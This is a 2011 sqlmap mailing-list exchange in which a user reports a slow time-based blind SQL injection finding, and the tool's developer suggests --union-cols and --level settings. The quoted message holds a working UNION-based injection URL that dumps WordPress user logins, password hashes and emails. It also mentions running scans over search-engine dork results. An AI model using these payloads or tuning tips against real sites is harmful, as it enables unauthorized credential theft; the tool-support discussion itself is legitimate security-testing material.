hi.

have you tried either:
A) --union-cols=15-25
and/or
B) --level=3

?

default --level=1 test goes up to 10 columns in UNION injections (if
ORDER BY can't be exploited)

kr

On Wed, Aug 17, 2011 at 11:10 PM, This LittlePiggy
<thislittlepiggyhadroastb...@hotmail.com> wrote:
>  sqlmap/1.0-dev (r4351)
>  found this
>
> Place: GET
> Parameter: id
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: id=155 AND SLEEP(5)
> ---
> against
> web application technology: Apache, PHP 5.2.8
> back-end DBMS: MySQL 5.0.11
> banner:    '5.0.77'
>
> but the exploit was agonizingly slow.
> testing each other individual technique --technique=BEUS  at default level
> and risk produced no positives
>
>
> mysqlat0r  found what it terms, 'method get, with single parameter,
>  'numerical without comments' positive and could quickly catalog dbs and
> dump full tables
> here is an example of it's exploit url
> http://127.0.0.1/news/edumacation/salsandvinablals/2011/individittiual09.php?id=-666%20UNION%20ALL%20SELECT%20null,
> concat(0x585858535441525444554D50585858,ID,0x7C7C7C,
> user_login,0x7C7C7C,user_pass,0x7C7C7C,user_nicename,0x7C7C7C,user_email,
> 0x7C7C7C,user_url,0x7C7C7C,user_registered,0x7C7C7C,user_activation_key,0x7C7C7C,
> user_status,0x7C7C7C,display_name,0x7C7C7C,0x585858454E4444554D50585858),
> null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20redridinghood_OSyummy2k11.wp_users%20LIMIT%200,10&
>
> full source for mysqlat0r available here
> http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r
>
>
> my previous experience has been that mysqlat0r only is able to exploit what
> it claims to have found about 10% of the time.
>
>
> it would be nice if sqlmap would continue to test the other techniques even
> after finding a positive, and show you a list of available positives
> in subsequent passes, as some are much faster, or have better features.
>  particularly when processing a dork resultset.
>
> i have seen it ask if i want to continue after a positive, but it doesn't
> seem to actually attempt each of the other techniques, but just skipped to
> the next result set item.  I'll retest that.
> i have been able to force it with the BEUST flags, and select the preferred
> one at runtime, but the UI for doing so is a little clumsy.
> ------------------------------------------------------------------------------
> Get a FREE DOWNLOAD! and learn more about uberSVN rich system,
> user administration capabilities and model configuration. Take
> the hassle out of deploying and managing Subversion and the
> tools developers use with it. http://p.sf.net/sfu/wandisco-d2d-2
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar (@stamparm)

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

------------------------------------------------------------------------------
Get a FREE DOWNLOAD! and learn more about uberSVN rich system, 
user administration capabilities and model configuration. Take 
the hassle out of deploying and managing Subversion and the 
tools developers use with it. http://p.sf.net/sfu/wandisco-d2d-2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to